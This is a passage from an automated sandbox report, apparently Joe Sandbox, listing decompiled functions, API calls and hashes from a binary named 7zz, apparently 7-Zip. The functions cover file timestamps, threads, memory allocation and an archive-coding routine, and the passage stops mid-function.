                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,0040B938,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B9CB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
                                                                      • Instruction ID: 00a41a6e43d9e9d2736f99314ed8b7868d2ac66bf7d75e366eb682c8f7b18308
                                                                      • Opcode Fuzzy Hash: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
                                                                      • Instruction Fuzzy Hash: 84D0127110416146DE642E3D7C445C737D8AA423303210B6BF0B5D32E1D3748CD356D8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040BD82 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E0040BD82(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                                                      0x0040bd90
                                                                      0x0040bd98
                                                                      0x0040bd9c

                                                                      APIs
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 0040BD90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileTime
                                                                      • String ID:
                                                                      • API String ID: 1425588814-0
                                                                      • Opcode ID: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
                                                                      • Instruction ID: 904542211cf95c1dba31585a344c430934b25bd4ea8d40f4864e79ca3744c005
                                                                      • Opcode Fuzzy Hash: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
                                                                      • Instruction Fuzzy Hash: 62C04C36158105FF8F020F70DC04C1EBBA6AB95711F10CA18B259C4070C7338034EB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00467AD0 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00467AD0(intOrPtr* __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _t4;
				long _t5;
				intOrPtr* _t12;

				_t12 = __ecx;
				_t4 = E0046CD08(0, 0, __edx, _a4, 0,  &_a4); // executed
				 *_t12 = _t4;
				if(_t4 == 0) {
					_t5 = GetLastError();
					if(_t5 == 0) {
						return 1;
					}
					return _t5;
				} else {
					return 0;
				}
			}






                                                                      0x00467ad8
                                                                      0x00467ae4
                                                                      0x00467aec
                                                                      0x00467af1
                                                                      0x00467af8
                                                                      0x00467b00
                                                                      0x00000000
                                                                      0x00467b02
                                                                      0x00467b07
                                                                      0x00467af3
                                                                      0x00467af5
                                                                      0x00467af5

                                                                      APIs
                                                                        • Part of subcall function 0046CD08: CreateThread.KERNELBASE ref: 0046CD49
                                                                        • Part of subcall function 0046CD08: GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53
                                                                      • GetLastError.KERNEL32(?,?,00414677,?,?), ref: 00467AF8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateThread
                                                                      • String ID:
                                                                      • API String ID: 665435222-0
                                                                      • Opcode ID: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
                                                                      • Instruction ID: f2b2db5cd6f09a71537b1524ed132628cfc4aafc29f8b6fc8c24ade46cb63582
                                                                      • Opcode Fuzzy Hash: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
                                                                      • Instruction Fuzzy Hash: 9CE086B22042015AE3109A549C05F6766989B90B45F04443EB944C6180F6A49950C76A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004585C0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004585C0(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                                      0x004585c2
                                                                      0x004585d1
                                                                      0x004585d7
                                                                      0x004585c4
                                                                      0x004585c6
                                                                      0x004585c6

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,0048DE00,00001000,00000004,00413C47,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585D1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
                                                                      • Instruction ID: c1be663b654be8f4f03ee9fe28526b1f2e61089ce9361c0db0236efe8358a087
                                                                      • Opcode Fuzzy Hash: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
                                                                      • Instruction Fuzzy Hash: BFB012B039124475FE6843344C0BF6F2140A390B47F50406CB705E80C4FFE05840541D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004585E0 Relevance: 1.3, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004585E0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}





                                                                      0x004585e2
                                                                      0x004585ec
                                                                      0x00000000
                                                                      0x004585ec
                                                                      0x004585f2

                                                                      APIs
                                                                      • VirtualFree.KERNELBASE(0040F696,00000000,00008000,00413C3C,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585EC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 1263568516-0
                                                                      • Opcode ID: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
                                                                      • Instruction ID: 99068d3d514b32bd65c0f8a450bbacd2dc59915ab1aca7adb646860191089de3
                                                                      • Opcode Fuzzy Hash: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
                                                                      • Instruction Fuzzy Hash: 9DB012F034130131FD3803110E05B1B10005740702E94802C7506B40C14D589804850C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00441925 Relevance: 20.4, APIs: 10, Strings: 1, Instructions: 1131COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E00441925(intOrPtr __ecx, signed int __edx) {
				void* __edi;
				intOrPtr _t641;
				intOrPtr* _t642;
				int _t650;
				char _t652;
				intOrPtr* _t654;
				intOrPtr _t669;
				signed int _t681;
				int _t700;
				intOrPtr* _t723;
				intOrPtr* _t729;
				int _t730;
				intOrPtr* _t731;
				intOrPtr* _t739;
				intOrPtr* _t744;
				intOrPtr* _t746;
				intOrPtr* _t754;
				intOrPtr* _t758;
				signed int _t766;
				intOrPtr* _t773;
				intOrPtr* _t775;
				intOrPtr* _t783;
				int _t788;
				intOrPtr _t790;
				struct _CRITICAL_SECTION* _t793;
				intOrPtr _t796;
				signed int _t797;
				void* _t805;
				int _t845;
				intOrPtr* _t852;
				int _t856;
				signed int _t857;
				int _t858;
				intOrPtr* _t865;
				intOrPtr* _t870;
				intOrPtr _t872;
				intOrPtr* _t880;
				intOrPtr* _t898;
				signed int _t902;
				signed int _t903;
				void* _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				intOrPtr* _t911;
				int _t928;
				intOrPtr _t931;
				signed int _t934;
				intOrPtr _t963;
				void* _t985;
				signed int _t996;
				signed int _t1133;
				signed int _t1135;
				signed int _t1154;
				signed int _t1155;
				void* _t1158;
				signed int _t1159;
				intOrPtr* _t1160;
				intOrPtr _t1161;
				struct _CRITICAL_SECTION* _t1163;
				void* _t1164;
				int _t1165;
				signed int _t1170;
				intOrPtr* _t1172;
				int _t1173;
				intOrPtr _t1174;
				signed int _t1175;
				int _t1176;
				intOrPtr* _t1177;
				signed int _t1178;
				intOrPtr _t1179;
				intOrPtr _t1180;
				intOrPtr _t1182;
				intOrPtr _t1183;
				intOrPtr _t1184;
				void* _t1186;
				void* _t1188;
				void* _t1189;
				void* _t1198;
				void* _t1205;

				_t1146 = __edx;
				E0046B890(E00478DCE, _t1186);
				_t1189 = _t1188 - 0x3a0;
				 *((intOrPtr*)(_t1186 - 0x24)) = __ecx;
				_t931 =  *((intOrPtr*)(_t1186 + 0x10));
				_t928 = 0;
				_t1154 = 0;
				 *((intOrPtr*)(_t1186 - 0x60)) = __edx;
				 *(_t1186 - 0x18) = 0;
				 *(_t1186 - 0x14) = 0;
				 *((intOrPtr*)(_t1186 - 0x30)) = 0;
				 *(_t1186 - 0x2c) = 0;
				 *((intOrPtr*)(_t1186 - 0x48)) = 0;
				 *(_t1186 - 0x44) = 0;
				if( *((intOrPtr*)(_t931 + 8)) <= 0) {
					L6:
					_t641 =  *((intOrPtr*)(_t1186 + 0x18));
					_t1194 = _t641 - _t928;
					if(_t641 != _t928) {
						 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t641 + 4));
						asm("adc [ebp-0x14], ebx");
					}
					_t642 =  *((intOrPtr*)(_t1186 + 0x1c));
					_t1155 = 1;
					 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + _t1155;
					asm("adc [ebp-0x14], ebx");
					 *((intOrPtr*)( *_t642 + 0xc))(_t642,  *(_t1186 - 0x18),  *(_t1186 - 0x14));
					_t1170 =  *(_t1186 + 0x14);
					E00439D90(_t1186 - 0x3ac, _t1194, _t1170);
					_t934 =  *(_t1170 + 0x40);
					 *(_t1186 - 4) = _t1155;
					 *(_t1186 - 0x18) = _t928;
					 *(_t1186 - 0x14) = _t928;
					 *(_t1186 - 0x20) = _t934;
					if(_t934 > 0x400) {
						 *(_t1186 - 0x20) = 0x400;
					}
					E0043DF8F(_t1186 - 0x2ec);
					 *(_t1186 - 4) = 2;
					if(_t1170 == _t928) {
						L12:
						 *(_t1186 - 0xd) = _t928;
						L13:
						_t1198 =  *(_t1186 - 0x2c) - _t928;
						if(_t1198 <= 0 && (_t1198 < 0 ||  *((intOrPtr*)(_t1186 - 0x30)) <= _t1155)) {
							 *(_t1186 - 0xd) = _t928;
						}
						if( *(_t1186 - 0xd) == _t928) {
							L37:
							_push( *((intOrPtr*)(_t1186 + 0x1c)));
							_push( *((intOrPtr*)(_t1186 + 0x18)));
							_push(_t1170);
							_push( *((intOrPtr*)(_t1186 + 0x10)));
							_push( *((intOrPtr*)(_t1186 + 0xc)));
							_push( *(_t1186 + 8));
							_t928 = E00443231( *((intOrPtr*)(_t1186 - 0x24)),  *((intOrPtr*)(_t1186 - 0x60)));
							goto L124;
						} else {
							_t652 =  *((intOrPtr*)( *((intOrPtr*)(_t1170 + 0xc))));
							 *((char*)(_t1186 - 0x39)) = _t652;
							if(_t652 != _t928) {
								L21:
								if(_t652 != 0xc) {
									L33:
									if( *((char*)(_t1186 - 0x39)) == 0xe) {
										_t902 =  *(_t1186 - 0x20);
										_t1133 = (0 |  *((intOrPtr*)(_t1170 + 0x20)) - _t928 > 0x00000000) + 1;
										_t903 = _t902 / _t1133;
										_t1146 = _t902 % _t1133;
										 *(_t1186 - 0x2ac) = _t1133;
										 *(_t1186 - 0x20) = _t903;
										if(_t903 <= _t1155) {
											 *(_t1186 - 0xd) = _t928;
										}
									}
									L36:
									if( *(_t1186 - 0xd) != _t928) {
										E00405B9F(_t1186 - 0x5c);
										 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
										_push(0x10);
										 *(_t1186 - 4) = 3;
										_t654 = E004079F2();
										__eflags = _t654 - _t928;
										if(_t654 == _t928) {
											_t1172 = 0;
											__eflags = 0;
										} else {
											 *(_t654 + 4) = _t928;
											 *(_t654 + 0xc) = _t928;
											 *_t654 = 0x47b89c;
											_t1172 = _t654;
										}
										__eflags = _t1172 - _t928;
										 *((intOrPtr*)(_t1186 - 0x64)) = _t1172;
										 *((intOrPtr*)(_t1186 - 0x28)) = _t1172;
										if(_t1172 != _t928) {
											 *((intOrPtr*)( *_t1172 + 4))(_t1172);
										}
										_push(1);
										_push( *((intOrPtr*)(_t1186 + 0x1c)));
										 *(_t1186 - 4) = 4;
										E00441191(_t1172);
										E00443921(_t1186 - 0x13c);
										_push( *((intOrPtr*)(_t1172 + 0xc)));
										 *(_t1186 - 4) = 5;
										_push( *(_t1186 - 0x20));
										E0040F265(_t1186 - 0x13c);
										E0044295A(_t1186 - 0xe4, 0x10000);
										L00467C60(_t1186 - 0xd8);
										 *(_t1186 - 0xc0) = _t928;
										 *(_t1186 - 4) = 6;
										 *((intOrPtr*)(_t1186 - 0xbc)) = _t1186 - 0xe4;
										E00443B5C(_t1186 - 0xb8);
										 *(_t1186 - 4) = 7;
										E00443A5E(_t1186 - 0x90);
										 *(_t1186 - 4) = 8;
										E00404AD0(_t1186 - 0xa4, 4);
										 *((intOrPtr*)(_t1186 - 0xa4)) = 0x47a7f0;
										 *(_t1186 - 4) = 9;
										E00404AD0(_t1186 - 0x7c, 4);
										 *((intOrPtr*)(_t1186 - 0x7c)) = 0x47a668;
										 *(_t1186 - 4) = 0xa;
										_t1173 = E0040E850(_t1186 - 0xe4,  *(_t1186 - 0x20) << 9, _t928);
										__eflags = _t1173 - _t928;
										if(_t1173 == _t928) {
											_t1174 =  *((intOrPtr*)(_t1186 + 0x10));
											_t1158 = 0;
											__eflags =  *((intOrPtr*)(_t1174 + 8)) - _t928;
											if( *((intOrPtr*)(_t1174 + 8)) <= _t928) {
												L50:
												_t1175 =  *(_t1186 - 0x20);
												__eflags = _t1175 - _t928;
												if(_t1175 <= _t928) {
													L52:
													_t1159 = 0;
													__eflags =  *(_t1186 - 0x20) - _t928;
													if( *(_t1186 - 0x20) <= _t928) {
														L63:
														 *(_t1186 - 0x2c) =  *(_t1186 - 0x2c) | 0xffffffff;
														 *(_t1186 - 0x40) = _t928;
														 *(_t1186 - 0x38) = _t928;
														_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
														__eflags = _t669 - _t928;
														if(_t669 <= _t928) {
															L123:
															E00440D28( *((intOrPtr*)(_t1186 - 0x24)), _t1146, _t1186 - 0x5c,  *((intOrPtr*)(_t1186 + 0x18)));
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															E00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															E00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															E0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															E0044395A(_t1186 - 0x13c, __eflags);
															 *(_t1186 - 4) = 3;
															E0043361B(_t1186 - 0x28);
															 *(_t1186 - 4) = 2;
															L00443C57(_t1186 - 0x5c);
															goto L124;
														} else {
															goto L64;
														}
														do {
															L64:
															__eflags =  *((intOrPtr*)(_t1186 - 0x74)) -  *(_t1186 - 0x20);
															if( *((intOrPtr*)(_t1186 - 0x74)) >=  *(_t1186 - 0x20)) {
																L95:
																_t681 =  *(_t1186 - 0x38) << 2;
																 *(_t1186 - 0x1c) = _t681;
																_t963 =  *((intOrPtr*)(_t681 +  *((intOrPtr*)(_t1186 - 0xac))));
																__eflags =  *((intOrPtr*)(_t963 + 0x41)) - _t928;
																if( *((intOrPtr*)(_t963 + 0x41)) == _t928) {
																	_t1160 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + _t681));
																	E0044375C(_t1186 - 0x294);
																	__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																	 *(_t1186 - 4) = 0x18;
																	if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																		L99:
																		E00443768(_t1186 - 0x294,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1160 + 8) * 4)));
																		_push(_t1186 - 0x294);
																		__eflags = E0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																		if(__eflags != 0) {
																			_t1176 = 0x80004001;
																			L146:
																			 *(_t1186 - 4) = 0xa;
																			E0043CD47(_t1186 - 0x294, __eflags);
																			 *(_t1186 - 4) = 9;
																			E00408604(_t1186 - 0x7c);
																			 *(_t1186 - 4) = 8;
																			E00408604(_t1186 - 0xa4);
																			 *(_t1186 - 4) = 7;
																			E00442DE5(_t1186 - 0x90);
																			 *(_t1186 - 4) = 6;
																			E00442E79(_t1186 - 0xbc);
																			 *(_t1186 - 4) = 5;
																			E0044296D(_t1186 - 0xe4);
																			 *(_t1186 - 4) = 4;
																			E0044395A(_t1186 - 0x13c, __eflags);
																			 *(_t1186 - 4) = 3;
																			E0043361B(_t1186 - 0x28);
																			L147:
																			 *(_t1186 - 4) = 2;
																			L00443C57(_t1186 - 0x5c);
																			L148:
																			 *(_t1186 - 4) = 1;
																			E0043E0CB(_t1186 - 0x2ec);
																			 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
																			E00442D78(_t1186 - 0x3ac);
																			_t650 = _t1176;
																			goto L125;
																		}
																		__eflags =  *_t1160 - _t928;
																		if( *_t1160 == _t928) {
																			_t1146 =  *(_t1186 + 8);
																			_t700 = E00442EE9( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 8), _t1160, _t1186 - 0x294,  *((intOrPtr*)(_t1186 - 0x28)), _t1186 - 0x18);
																			__eflags = _t700 - _t928;
																			if(__eflags != 0) {
																				L145:
																				_t1176 = _t700;
																				goto L146;
																			}
																			L119:
																			_push(_t1186 - 0x294);
																			L00443C8F(_t1186 - 0x5c);
																			 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + 0x1a;
																			asm("adc [ebp-0x14], ebx");
																			E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																			_t494 = _t1186 - 0x38;
																			 *_t494 =  *(_t1186 - 0x38) + 1;
																			__eflags =  *_t494;
																			L120:
																			 *(_t1186 - 4) = 0xa;
																			_t985 = _t1186 - 0x294;
																			L121:
																			E0043CD47(_t985, __eflags);
																			goto L122;
																		}
																		L101:
																		__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																		if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																			_t790 = E00440593(_t1186 - 0x294);
																		} else {
																			_t790 =  *((intOrPtr*)(_t1160 + 2));
																		}
																		__eflags = _t790 - _t928;
																		if(_t790 == _t928) {
																			__eflags =  *(_t1186 - 0x2c) -  *(_t1186 - 0x38);
																			if( *(_t1186 - 0x2c) >=  *(_t1186 - 0x38)) {
																				_t1178 =  *(_t1186 + 0x14);
																			} else {
																				_t1178 =  *(_t1186 + 0x14);
																				 *(_t1186 - 0x2c) =  *(_t1186 - 0x38);
																				_t1146 = _t1178;
																				E00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				E0044072C( *((intOrPtr*)(_t1186 - 0x270)),  *((intOrPtr*)(_t1160 + 0x18)),  *((intOrPtr*)(_t1160 + 0x1c)),  *((intOrPtr*)(_t1178 + 0x54)));
																			}
																			_t793 =  *( *(_t1186 - 0x1c) +  *((intOrPtr*)(_t1186 - 0xac)));
																			 *(_t1186 - 0x68) = _t793;
																			__eflags =  *((intOrPtr*)(_t793 + 0x40)) - _t928;
																			if( *((intOrPtr*)(_t793 + 0x40)) == _t928) {
																				_t1179 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) +  *( *(_t1186 - 0x70)) * 4));
																				_t796 =  *((intOrPtr*)(_t1179 + 0x18));
																				__eflags =  *((intOrPtr*)(_t796 + 0x15)) - _t928;
																				if( *((intOrPtr*)(_t796 + 0x15)) == _t928) {
																					 *(_t1186 - 0x44) = _t928;
																					_push(_t1186 - 0x44);
																					 *(_t1186 - 4) = 0x1a;
																					E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																					E00442A14( *((intOrPtr*)(_t1179 + 0x18)),  *(_t1186 - 0x44));
																					 *((char*)( *((intOrPtr*)(_t1179 + 0x18)) + 0x15)) = 1;
																					E00467B10( *((intOrPtr*)(_t1179 + 0x18)) + 0x1c);
																					 *(_t1186 - 4) = 0x18;
																					E0043361B(_t1186 - 0x44);
																				}
																				_t797 = WaitForMultipleObjects( *(_t1186 - 0x9c),  *(_t1186 - 0x98), _t928, 0xffffffff);
																				 *(_t1186 - 0x1c) = _t797;
																				_t1180 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + ( *(_t1186 - 0x70))[_t797] * 4));
																				L00437D6C(_t1180 + 0x20);
																				_t700 =  *(_t1180 + 0x9c);
																				 *((char*)(_t1180 + 0xb8)) = 1;
																				__eflags = _t700 - _t928;
																				if(__eflags != 0) {
																					goto L145;
																				} else {
																					E00408784(_t1186 - 0x7c,  *(_t1186 - 0x1c), 1);
																					E00408784(_t1186 - 0xa4,  *(_t1186 - 0x1c), 1);
																					__eflags =  *(_t1186 - 0x1c) - _t928;
																					if(__eflags != 0) {
																						_t1165 =  *( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1180 + 0xbc) * 4);
																						 *(_t1186 - 0x1c) = _t1165;
																						E0040F015( *(_t1180 + 0x18), __eflags, _t1165);
																						_t996 = 6;
																						_t805 = memcpy(_t1165 + 0x28, _t1180 + 0xa0, _t996 << 2);
																						_t1189 = _t1189 + 0xc;
																						 *((char*)(_t805 + 0x40)) = 1;
																						goto L120;
																					}
																					_t700 = E0040F032( *(_t1180 + 0x18));
																					__eflags = _t700 - _t928;
																					if(__eflags != 0) {
																						goto L145;
																					}
																					 *(_t1186 - 0x1c) =  *(_t1180 + 0x18);
																					L00437D6C( *(_t1180 + 0x18) + 0x54);
																					L00437D6C( *(_t1186 - 0x1c) + 0x50);
																					_push(_t1186 - 0x294);
																					_push( *((intOrPtr*)( *(_t1186 + 0x14) + 0x55)));
																					E00442BEC(_t1180 + 0xa0,  *((intOrPtr*)( *(_t1186 + 0x14) + 0x54)));
																					_t1146 =  *(_t1186 + 0x14);
																					E00442B0A( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																					_push(_t1186 - 0x294);
																					E004408BF( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14));
																					goto L119;
																				}
																			} else {
																				 *(_t1186 - 0x1c) = _t928;
																				_push(_t1186 - 0x1c);
																				 *(_t1186 - 4) = 0x19;
																				E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																				E0040E94A( *(_t1186 - 0x68),  *((intOrPtr*)(_t1186 - 0xe0)),  *(_t1186 - 0x1c));
																				_push(_t1186 - 0x294);
																				_push( *((intOrPtr*)(_t1178 + 0x55)));
																				E00442BEC( *(_t1186 - 0x68) + 0x28,  *((intOrPtr*)(_t1178 + 0x54)));
																				_t1146 = _t1178;
																				E00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				_push(_t1186 - 0x294);
																				E004408BF( *((intOrPtr*)(_t1186 - 0x24)), _t1178);
																				E0040E933( *(_t1186 - 0x68), _t1160, _t1186 - 0xe4);
																				 *(_t1186 - 4) = 0x18;
																				E0043361B(_t1186 - 0x1c);
																				goto L119;
																			}
																		} else {
																			_t1146 =  *(_t1186 + 0x14);
